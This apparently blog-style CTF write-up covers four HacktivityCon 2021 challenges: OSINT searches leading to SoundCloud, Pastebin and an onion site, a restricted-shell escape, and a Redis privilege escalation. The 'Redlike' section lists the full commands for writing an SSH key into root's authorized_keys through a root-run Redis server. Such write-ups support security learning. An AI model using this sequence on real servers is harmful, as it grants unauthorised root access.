I participated in the HacktivityCon 2021 CTF and solved a bunch of challenges which I am going to share.
Challenges
1.Jed Sheeran
Difficulty:medium
Category:OSINT
Description:Oh we have another fan with a budding music career! Jed Sheeran is seemingly trying to produce new songs based off of his number one favorite artist… but it doesn’t all sound so good. Can you find him?
Solution
I searched “Jed Sheeran” on google and the first url was a soundcloud profile that belonged to a user called Jed Sheeran.
The user had posted a few songs so I clicked on the first one and found the flag
2. Mike Shallot
Difficulty:medium
Category:OSINT
Description:Mike Shallot is one shady fella. We are aware of him trying to share some specific intel, but hide it amongst the corners and crevices of internet. Can you find his secret?
Solution
searching “Mike Shallot” on google does not spill juicy info so I opted to use a tool called sherlock which is used to hunt down social media accounts by username
The Pastebin account looks interesting. I decided to open using a web browser and found this paste
Mike’s profile picture is a Tor browser icon thus the long string of random characters is a hidden website.
I added .onion at the end and opened it using Tor browser. On appending “pduplowzp/nndw79” to URL I got the flag
3.Bad Words
Dificulty:easy
Category:Miscellaneous
Description:
I ran this command `nc challenge.ctf.games 31174` on my terminal and got a shell a few seconds later. I tried running some commands and most of them were restricted.
I then decide to escape the commands with forward slash “\” and …
That’s how I got the flag
4.Redlike
Dificulty:medium
Category:Miscellaneous
Description:
solution:
I ssh’ed into the machine using the password given and got a shell.
I typed “sudo -l” and the response was
I decided to check the processes running as root which could be used to escalate privileges to root by entering this command “ps axu”
As you can see there is a redis server running as root so I decided to research on I can use it to elevate my privileges and found that It can be used to write my public key to the “/root/.ssh/authorized_keys” file and gain root access through SSH.
I entered these commands one by one
`ssh-keygen -t rsa -b 2048
(echo -e “\n\n”; cat ~/.ssh/id_rsa.pub; echo -e “\n\n”) > redis.txt
cat redis.txt | redis-cli -h 127.0.0.1 -x set public
redis-cli -h 127.0.0.1
config set dir /root/.ssh/
config set dbfilename “authorized_keys”
save`
I then elevated my privileges by sshing as the root user by `ssh -i ~/.ssh/id_rsa root@127.0.0.1`
here is the flag